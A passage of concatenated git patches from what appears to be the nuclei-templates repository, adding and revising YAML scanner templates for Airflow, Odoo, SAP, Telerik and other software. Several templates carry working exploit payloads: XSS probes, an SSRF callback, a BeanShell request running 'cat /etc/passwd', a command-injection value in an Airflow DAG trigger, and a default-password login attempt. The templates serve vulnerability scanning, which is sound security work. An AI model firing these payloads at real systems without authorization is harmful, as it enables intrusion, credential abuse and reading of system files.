"{{BaseURL}}/error3?msg=30&data=';alert('nuclei');//" + - "{{BaseURL}}/omni_success?cmdb_edit_path=");alert('nuclei');//" matchers-condition: and matchers: - type: word @@ -30,4 +31,4 @@ requests: - "nuclei" - "No policy has been chosen." condition: and - part: body \ No newline at end of file + part: body From 63723211319130cca517b8f5d8fee0b01ec960d0 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Wed, 2 Jun 2021 11:30:05 +0900 Subject: [PATCH 087/144] Create odoo-openredirect.yaml --- odoo-openredirect.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 odoo-openredirect.yaml diff --git a/odoo-openredirect.yaml b/odoo-openredirect.yaml new file mode 100644 index 0000000000..57bf18074e --- /dev/null +++ b/odoo-openredirect.yaml @@ -0,0 +1,20 @@ +id: Odoo-CMS-Open-redirection + +info: + name: Odoo CMS - Open redirection all Version + author: 0x_Akoko + description: Odoo CMS - Open redirection all Version. + reference: https://cxsecurity.com/issue/WLB-2021020143 + severity: low + tags: odoo,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/website/lang/en_US?r=https://example.com/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header From f28fdf610bf3b9be4c1dd3598d97d0e47e1c2bb3 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Wed, 2 Jun 2021 11:39:27 +0530 Subject: [PATCH 088/144] Create CVE-2020-6308.yaml --- cves/2020/CVE-2020-6308.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 cves/2020/CVE-2020-6308.yaml diff --git a/cves/2020/CVE-2020-6308.yaml b/cves/2020/CVE-2020-6308.yaml new file mode 100644 index 0000000000..a9d1af9ed2 --- /dev/null +++ b/cves/2020/CVE-2020-6308.yaml @@ -0,0 +1,22 @@ +id: CVE-2020-6308 + +info: + name: Unauthenticated Blind SSRF in SAP + author: madrobot + severity: medium + description: https://github.com/InitRoot/CVE-2020-6308-PoC + tags: cve,cve2020,sap,ssrf + +requests: + - method: POST + path: + - '{{BaseURL}}/AdminTools/querybuilder/logon?framework=' + - '{{BaseURL}}:8080/AdminTools/querybuilder/logon?framework=' + + body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp + + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" From e3f42066bfd16ec5d708dedad601340b8cd21d37 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 2 Jun 2021 09:39:35 +0300 Subject: [PATCH 089/144] Spelling --- cves/2020/CVE-2020-36112.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-36112.yaml b/cves/2020/CVE-2020-36112.yaml index 4969235916..142c4a081a 100644 --- a/cves/2020/CVE-2020-36112.yaml +++ b/cves/2020/CVE-2020-36112.yaml @@ -3,7 +3,7 @@ id: CVE-2020-36112 info: name: CSE Bookstore 1.0 SQL Injection author: geeknik - description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database. + description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database. reference: | - https://www.exploit-db.com/exploits/49314 - https://www.tenable.com/cve/CVE-2020-36112 From 2fe2c88872869d1000807058d2266e04fa9f7523 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 2 Jun 2021 12:22:24 +0530 Subject: [PATCH 090/144] Moving files around --- .../other/odoo-cms-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename odoo-openredirect.yaml => vulnerabilities/other/odoo-cms-redirect.yaml (94%) diff --git a/odoo-openredirect.yaml b/vulnerabilities/other/odoo-cms-redirect.yaml similarity index 94% rename from odoo-openredirect.yaml rename to vulnerabilities/other/odoo-cms-redirect.yaml index 57bf18074e..9ccd8e1d01 100644 --- a/odoo-openredirect.yaml +++ b/vulnerabilities/other/odoo-cms-redirect.yaml @@ -1,4 +1,4 @@ -id: Odoo-CMS-Open-redirection +id: odoo-cms-redirect info: name: Odoo CMS - Open redirection all Version From a3d956e0a037f3bccbe8795ba58d60c895e9cc06 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 2 Jun 2021 06:54:34 +0000 Subject: [PATCH 091/144] Auto Update README [Wed Jun 2 06:54:34 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 492cfc0947..1b5f3c8e91 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 325 | vulnerabilities | 176 | exposed-panels | 144 | +| cves | 325 | vulnerabilities | 177 | exposed-panels | 144 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 67 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1191 files**. +**110 directories, 1192 files**. From 5269cc1c877140f3915f27146f8ded1dc0648313 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 2 Jun 2021 13:17:00 +0530 Subject: [PATCH 092/144] Update CVE-2021-22122.yaml --- cves/2021/CVE-2021-22122.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-22122.yaml b/cves/2021/CVE-2021-22122.yaml index b7023eb868..213b811b3d 100644 --- a/cves/2021/CVE-2021-22122.yaml +++ b/cves/2021/CVE-2021-22122.yaml @@ -23,7 +23,7 @@ requests: - method: GET path: - "{{BaseURL}}/error3?msg=30&data=';alert('nuclei');//" - - "{{BaseURL}}/omni_success?cmdb_edit_path=");alert('nuclei');//" + - "{{BaseURL}}/omni_success?cmdb_edit_path=\");alert('nuclei');//" matchers-condition: and matchers: - type: word From 7fac0067d016ba7e717a58335570214a84ac7eb7 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 2 Jun 2021 13:38:17 +0530 Subject: [PATCH 093/144] Additional paths for Telerik Web UI --- .../telerik-dialoghandler-detect.yaml | 27 ++++++++++++++----- 1 file changed, 20 insertions(+), 7 deletions(-) diff --git a/technologies/telerik-dialoghandler-detect.yaml b/technologies/telerik-dialoghandler-detect.yaml index c980e077e1..55311b4bd0 100644 --- a/technologies/telerik-dialoghandler-detect.yaml +++ b/technologies/telerik-dialoghandler-detect.yaml @@ -4,17 +4,30 @@ info: name: Detect Telerik Web UI Dialog Handler author: organiccrap & zhenwarx severity: info - reference: https://captmeelo.com/pentest/2018/08/03/pwning-with-telerik.html + reference: | + - https://captmeelo.com/pentest/2018/08/03/pwning-with-telerik.html + - https://github.com/bao7uo/dp_crypto tags: telerik,asp requests: - method: GET path: - - '{{BaseURL}}/Telerik.Web.UI.DialogHandler.aspx' - - '{{BaseURL}}/DesktopModules/Admin/RadEditorProvider/telerik.web.ui.dialoghandler.aspx' - - '{{BaseURL}}/providers/htmleditorproviders/telerik/telerik.web.ui.dialoghandler.aspx' - - '{{BaseURL}}/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx' - - '{{BaseURL}}/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx' + - '{{BaseURL}}/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1' + - '{{BaseURL}}/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1' + - '{{BaseURL}}/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1' + - '{{BaseURL}}/DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1' matchers-condition: and matchers: @@ -23,4 +36,4 @@ requests: - 200 - type: word words: - - Loading the dialog... + - 'Invalid length for a Base-64 char array' From f4b56b55e668b29768ef11dc9bf1f29e945674cb Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 2 Jun 2021 19:37:32 +0700 Subject: [PATCH 094/144] Update nc-bsh-servlet-rce.yaml --- vulnerabilities/other/nc-bsh-servlet-rce.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/other/nc-bsh-servlet-rce.yaml b/vulnerabilities/other/nc-bsh-servlet-rce.yaml index 0aa2f0ee04..295ceae036 100644 --- a/vulnerabilities/other/nc-bsh-servlet-rce.yaml +++ b/vulnerabilities/other/nc-bsh-servlet-rce.yaml @@ -14,7 +14,7 @@ requests: Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded - + bsh.script=exec("cat /etc/passwd"); - | #windows @@ -22,9 +22,8 @@ requests: Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded - - bsh.script=exec("ipconfig"); + bsh.script=exec("ipconfig"); matchers-condition: and matchers: From 1083d160b1437b8268ec7f22074845969f045744 Mon Sep 17 00:00:00 2001 From: Pramod Sargar <41449799+impramodsargar@users.noreply.github.com> Date: Wed, 2 Jun 2021 19:21:52 +0530 Subject: [PATCH 095/144] dotCMS admin panel added --- exposed-panels/dotcms-admin-panel.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 exposed-panels/dotcms-admin-panel.yaml diff --git a/exposed-panels/dotcms-admin-panel.yaml b/exposed-panels/dotcms-admin-panel.yaml new file mode 100644 index 0000000000..d873386ea3 --- /dev/null +++ b/exposed-panels/dotcms-admin-panel.yaml @@ -0,0 +1,18 @@ +id: dotcms-admin-panel + +info: + name: dotcms-admin-panel + author: impramodsargar + severity: info + tags: panel + +requests: + - method: GET + path: + - "{{BaseURL}}/dotAdmin/" + + matchers-condition: and + matchers: + - type: word + words: + - 'dotCMS Content Management Platform' From 6652b2ddb6f5ce1c4852a71165a20a5be59026dc Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 13:57:09 +0530 Subject: [PATCH 096/144] Added CVE-2020-11978 --- cves/2020/CVE-2020-11978.yaml | 65 +++++++++++++++++++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 cves/2020/CVE-2020-11978.yaml diff --git a/cves/2020/CVE-2020-11978.yaml b/cves/2020/CVE-2020-11978.yaml new file mode 100644 index 0000000000..e9964eedcd --- /dev/null +++ b/cves/2020/CVE-2020-11978.yaml @@ -0,0 +1,65 @@ +id: CVE-2020-11978 +info: + name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution + author: pdteam + severity: high + description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. + reference: | + - https://github.com/pberba/CVE-2020-11978 + - https://nvd.nist.gov/vuln/detail/CVE-2020-11978 + - https://twitter.com/wugeej/status/1400336603604668418 + tags: cve,cve2020,apache,airflow,rce + +requests: + - raw: + - | + GET /api/experimental/test HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept-Encoding: gzip, deflate + Accept: */* + + - | + GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept-Encoding: gzip, deflate + Accept: */* + + - | + POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept-Encoding: gzip, deflate + Accept: */* + Content-Length: 85 + Content-Type: application/json + + {"conf": {"message": "\"; touch test #"}} + + - | + GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept-Encoding: gzip, deflate + Accept: */* + + + extractors: + - type: regex + name: exec_date + part: body + group: 1 + internal: true + regex: + - '"execution_date":"([0-9-A-Z:+]+)"' + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body_4, "operator":"BashOperator")' + - 'contains(all_headers_4, "application/json")' + condition: and + From 4a0e83037de5741cfd890c570816a300830ccd2d Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 13:58:41 +0530 Subject: [PATCH 097/144] Update CVE-2020-11978.yaml --- cves/2020/CVE-2020-11978.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-11978.yaml b/cves/2020/CVE-2020-11978.yaml index e9964eedcd..0b7751f18a 100644 --- a/cves/2020/CVE-2020-11978.yaml +++ b/cves/2020/CVE-2020-11978.yaml @@ -61,5 +61,4 @@ requests: dsl: - 'contains(body_4, "operator":"BashOperator")' - 'contains(all_headers_4, "application/json")' - condition: and - + condition: and \ No newline at end of file From bdc803fd4b5ee87a02b7453f20ccf42a9febfd90 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 14:23:34 +0530 Subject: [PATCH 098/144] Added CVE-2020-13927 --- cves/2020/CVE-2020-13927.yaml | 20 ++++++++++++++++++++ misconfiguration/airflow-api-exposure.yaml | 13 +++++++++---- 2 files changed, 29 insertions(+), 4 deletions(-) create mode 100644 cves/2020/CVE-2020-13927.yaml diff --git a/cves/2020/CVE-2020-13927.yaml b/cves/2020/CVE-2020-13927.yaml new file mode 100644 index 0000000000..0a5d03ba2a --- /dev/null +++ b/cves/2020/CVE-2020-13927.yaml @@ -0,0 +1,20 @@ +id: CVE-2020-13927 + +info: + name: Unauthenticated Airflow Experimental REST API + author: pdteam + severity: medium + tags: cve,cve2020,apache,airflow,unauth + +requests: + - method: GET + path: + - '{{BaseURL}}/api/experimental/latest_runs' + + matchers: + - type: word + words: + - '"dag_run_url":' + - '"dag_id":' + - '"items":' + condition: and \ No newline at end of file diff --git a/misconfiguration/airflow-api-exposure.yaml b/misconfiguration/airflow-api-exposure.yaml index 2d73efdfce..0336a47dec 100644 --- a/misconfiguration/airflow-api-exposure.yaml +++ b/misconfiguration/airflow-api-exposure.yaml @@ -1,18 +1,23 @@ -id: airflow-api-exposure +id: CVE-2020-13927 info: - name: Apache Airflow API Exposure / Unauthenticated Access + name: Unauthenticated Airflow Experimental REST API author: pdteam severity: medium - tags: apache,airflow,unauth + tags: cve,cve2020,apache,airflow,unauth + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2020-13927 + - https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E requests: - method: GET path: - '{{BaseURL}}/api/experimental/latest_runs' + matchers: - type: word words: - '"dag_run_url":' - - '{"items":[' + - '"dag_id":' + - '"items":' condition: and \ No newline at end of file From 4cf49fa3977b47ff55dd448b07fec9f8f031f7b0 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 14:31:16 +0530 Subject: [PATCH 099/144] Duplicate template Duplicate with misconfiguration/unauthenticated-airflow.yaml --- exposed-panels/airflow-exposure.yaml | 19 ------------------- 1 file changed, 19 deletions(-) delete mode 100644 exposed-panels/airflow-exposure.yaml diff --git a/exposed-panels/airflow-exposure.yaml b/exposed-panels/airflow-exposure.yaml deleted file mode 100644 index 9130363b09..0000000000 --- a/exposed-panels/airflow-exposure.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: airflow-exposure - -info: - name: Apache Airflow Exposure / Unauthenticated Access - author: pdteam - severity: medium - tags: panel - -requests: - - method: GET - path: - - '{{BaseURL}}' - - '{{BaseURL}}/admin/' - matchers: - - type: word - words: - - 'Airflow - DAGs' - - '' - condition: and \ No newline at end of file From 2ca551360614e0fcbb6264bc3cc260369b5fa37e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 14:35:16 +0530 Subject: [PATCH 100/144] Added airflow detection template --- technologies/apache-airflow.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/apache-airflow.yaml diff --git a/technologies/apache-airflow.yaml b/technologies/apache-airflow.yaml new file mode 100644 index 0000000000..e7f63e3b54 --- /dev/null +++ b/technologies/apache-airflow.yaml @@ -0,0 +1,24 @@ +id: apache-airflow + +info: + name: Apache Airflow + author: pdteam + severity: info + tags: tech,apache,airflow + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/airflow/login" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Airflow - Login" + + - type: status + status: + - 200 \ No newline at end of file From 081eb1d134959453de764ec0e8454b5242f50eb8 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 16:05:42 +0530 Subject: [PATCH 101/144] Create airflow-workflow.yaml --- workflows/airflow-workflow.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 workflows/airflow-workflow.yaml diff --git a/workflows/airflow-workflow.yaml b/workflows/airflow-workflow.yaml new file mode 100644 index 0000000000..a60411e4b3 --- /dev/null +++ b/workflows/airflow-workflow.yaml @@ -0,0 +1,16 @@ +id: airflow-workflow + +info: + name: Apache Airflow Security Checks + author: pdteam + description: A simple workflow that runs all Apache Airflow related nuclei templates on a given target. + tags: workflow + +workflows: + + - template: technologies/apache-airflow.yaml + subtemplates: + - template: cves/2020/CVE-2020-11978.yaml + - template: cves/2020/CVE-2020-13927.yaml + - template: exposures/configs/airflow-configuration-exposure.yaml + - template: misconfiguration/unauthenticated-airflow.yaml \ No newline at end of file From e79f393a2a830910a4faa3fd69091adf3f4ebccb Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 18:10:37 +0530 Subject: [PATCH 102/144] Added Airflow default login check --- .../apache/airflow-default-credentials.yaml | 61 +++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100644 default-logins/apache/airflow-default-credentials.yaml diff --git a/default-logins/apache/airflow-default-credentials.yaml b/default-logins/apache/airflow-default-credentials.yaml new file mode 100644 index 0000000000..71f4584cb5 --- /dev/null +++ b/default-logins/apache/airflow-default-credentials.yaml @@ -0,0 +1,61 @@ +id: airflow-default-credentials + +info: + name: Apache Airflwo Default Credentials + author: pdteam + severity: critical + tags: airflow,default-login + reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html + +requests: + - raw: + - | + GET /admin/airflow/login HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Connection: close + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Language: en-US,en;q=0.9 + + - | + POST /admin/airflow/login HTTP/1.1 + Host: {{Hostname}} + Content-Length: 152 + Cache-Control: max-age=0 + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/admin/airflow/login + Accept-Encoding: gzip, deflate + Accept-Language: en-IN,en;q=0.9 + Connection: close + + username=airflow&password=airflow&_csrf_token={{csrf_token}} + + extractors: + - type: regex + name: csrf_token + group: 1 + part: body + internal: true + regex: + - 'csrf_token" type="hidden" value="([A-Za-z0-9.-]+)">' + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + words: + - "session=." + - "/admin/" + part: header + condition: and + + - type: word + words: + - 'You should be redirected automatically to target URL: /admin/' + part: body + + - type: status + status: + - 302 From 889872490d6342b88252c89adea91fa59f2b723c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 18:12:31 +0530 Subject: [PATCH 103/144] Updated workflow --- workflows/airflow-workflow.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/workflows/airflow-workflow.yaml b/workflows/airflow-workflow.yaml index a60411e4b3..d6f0730099 100644 --- a/workflows/airflow-workflow.yaml +++ b/workflows/airflow-workflow.yaml @@ -13,4 +13,5 @@ workflows: - template: cves/2020/CVE-2020-11978.yaml - template: cves/2020/CVE-2020-13927.yaml - template: exposures/configs/airflow-configuration-exposure.yaml - - template: misconfiguration/unauthenticated-airflow.yaml \ No newline at end of file + - template: misconfiguration/unauthenticated-airflow.yaml + - template: default-logins/apache/airflow-default-credentials.yaml \ No newline at end of file From 4f7a3c8ed7c42f9f08681b5b383b7797932e60b4 Mon Sep 17 00:00:00 2001 From: Ais8Ooz8 <66470347+Ais8Ooz8@users.noreply.github.com> Date: Thu, 3 Jun 2021 15:47:49 +0300 Subject: [PATCH 104/144] Update detect-options-method.yaml --- miscellaneous/detect-options-method.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miscellaneous/detect-options-method.yaml b/miscellaneous/detect-options-method.yaml index 6e56d2176f..dbeba332e1 100644 --- a/miscellaneous/detect-options-method.yaml +++ b/miscellaneous/detect-options-method.yaml @@ -16,4 +16,4 @@ requests: part: header group: 1 regex: - - "Allow: ([A-Z,]+)" + - "Allow: ([A-Z, ]+)" From 0c4f75d3adb40f1b9c7539d30bba6b1c7ae4cdde Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 18:44:50 +0530 Subject: [PATCH 105/144] Duplicate template --- misconfiguration/airflow-api-exposure.yaml | 23 ---------------------- 1 file changed, 23 deletions(-) delete mode 100644 misconfiguration/airflow-api-exposure.yaml diff --git a/misconfiguration/airflow-api-exposure.yaml b/misconfiguration/airflow-api-exposure.yaml deleted file mode 100644 index 0336a47dec..0000000000 --- a/misconfiguration/airflow-api-exposure.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: CVE-2020-13927 - -info: - name: Unauthenticated Airflow Experimental REST API - author: pdteam - severity: medium - tags: cve,cve2020,apache,airflow,unauth - reference: | - - https://nvd.nist.gov/vuln/detail/CVE-2020-13927 - - https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E - -requests: - - method: GET - path: - - '{{BaseURL}}/api/experimental/latest_runs' - - matchers: - - type: word - words: - - '"dag_run_url":' - - '"dag_id":' - - '"items":' - condition: and \ No newline at end of file From a0e234fd156bbc51795ef3005ad83921a2194779 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 19:30:09 +0530 Subject: [PATCH 106/144] misc changes --- .../airflow-panel.yaml | 6 ++--- technologies/airflow-detect.yaml | 24 +++++++++++++++++++ workflows/airflow-workflow.yaml | 3 ++- 3 files changed, 29 insertions(+), 4 deletions(-) rename technologies/apache-airflow.yaml => exposed-panels/airflow-panel.yaml (76%) create mode 100644 technologies/airflow-detect.yaml diff --git a/technologies/apache-airflow.yaml b/exposed-panels/airflow-panel.yaml similarity index 76% rename from technologies/apache-airflow.yaml rename to exposed-panels/airflow-panel.yaml index e7f63e3b54..3b97fec8be 100644 --- a/technologies/apache-airflow.yaml +++ b/exposed-panels/airflow-panel.yaml @@ -1,10 +1,10 @@ -id: apache-airflow +id: airflow-panel info: - name: Apache Airflow + name: Airflow Admin login author: pdteam severity: info - tags: tech,apache,airflow + tags: panel,apache,airflow requests: - method: GET diff --git a/technologies/airflow-detect.yaml b/technologies/airflow-detect.yaml new file mode 100644 index 0000000000..f2d6d97aa2 --- /dev/null +++ b/technologies/airflow-detect.yaml @@ -0,0 +1,24 @@ +id: airflow-detect + +info: + name: Apache Airflow + author: pdteam + severity: info + tags: tech,apache,airflow + +requests: + - method: GET + path: + - "{{BaseURL}}/{{randstr}}" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Airflow 404 = lots of circles" + + - type: status + status: + - 404 \ No newline at end of file diff --git a/workflows/airflow-workflow.yaml b/workflows/airflow-workflow.yaml index d6f0730099..1a21c5ba10 100644 --- a/workflows/airflow-workflow.yaml +++ b/workflows/airflow-workflow.yaml @@ -8,10 +8,11 @@ info: workflows: - - template: technologies/apache-airflow.yaml + - template: technologies/airflow-detect.yaml subtemplates: - template: cves/2020/CVE-2020-11978.yaml - template: cves/2020/CVE-2020-13927.yaml + - template: exposed-panels/airflow-panel.yaml - template: exposures/configs/airflow-configuration-exposure.yaml - template: misconfiguration/unauthenticated-airflow.yaml - template: default-logins/apache/airflow-default-credentials.yaml \ No newline at end of file From 0c436e35aabd628a8457418e9bdfbcb9e8a16632 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 19:39:51 +0530 Subject: [PATCH 107/144] Added airflow-debug --- misconfiguration/airflow/airflow-debug.yaml | 26 +++++++++++++++++++ .../unauthenticated-airflow.yaml | 0 workflows/airflow-workflow.yaml | 4 +-- 3 files changed, 28 insertions(+), 2 deletions(-) create mode 100644 misconfiguration/airflow/airflow-debug.yaml rename misconfiguration/{ => airflow}/unauthenticated-airflow.yaml (100%) diff --git a/misconfiguration/airflow/airflow-debug.yaml b/misconfiguration/airflow/airflow-debug.yaml new file mode 100644 index 0000000000..dc6f4a4a58 --- /dev/null +++ b/misconfiguration/airflow/airflow-debug.yaml @@ -0,0 +1,26 @@ +id: airflow-debug + +info: + name: Airflow Debug Trace + author: pdteam + severity: low + tags: apache,airflow,fpd + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/airflow/login" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "

Ooops.

" + - "Traceback (most recent call last)" + condition: and + + - type: status + status: + - 500 \ No newline at end of file diff --git a/misconfiguration/unauthenticated-airflow.yaml b/misconfiguration/airflow/unauthenticated-airflow.yaml similarity index 100% rename from misconfiguration/unauthenticated-airflow.yaml rename to misconfiguration/airflow/unauthenticated-airflow.yaml diff --git a/workflows/airflow-workflow.yaml b/workflows/airflow-workflow.yaml index 1a21c5ba10..8a5a9164e8 100644 --- a/workflows/airflow-workflow.yaml +++ b/workflows/airflow-workflow.yaml @@ -14,5 +14,5 @@ workflows: - template: cves/2020/CVE-2020-13927.yaml - template: exposed-panels/airflow-panel.yaml - template: exposures/configs/airflow-configuration-exposure.yaml - - template: misconfiguration/unauthenticated-airflow.yaml - - template: default-logins/apache/airflow-default-credentials.yaml \ No newline at end of file + - template: default-logins/apache/airflow-default-credentials.yaml + - template: misconfiguration/airflow/ \ No newline at end of file From 9147d61ce7da38ca926c818fd4bc086c4569240b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 19:48:37 +0530 Subject: [PATCH 108/144] Added missing tags --- exposures/configs/airflow-configuration-exposure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/airflow-configuration-exposure.yaml b/exposures/configs/airflow-configuration-exposure.yaml index cf59dd669c..a715bba8ac 100644 --- a/exposures/configs/airflow-configuration-exposure.yaml +++ b/exposures/configs/airflow-configuration-exposure.yaml @@ -4,7 +4,7 @@ info: name: Apache Airflow Configuration Exposure author: pdteam severity: medium - tags: exposure,config + tags: exposure,config,airflow,apache requests: - method: GET From f12cbf2fd11f9b5cac95196b54b0b4bf123353b9 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 20:09:37 +0530 Subject: [PATCH 109/144] typo --- default-logins/apache/airflow-default-credentials.yaml | 2 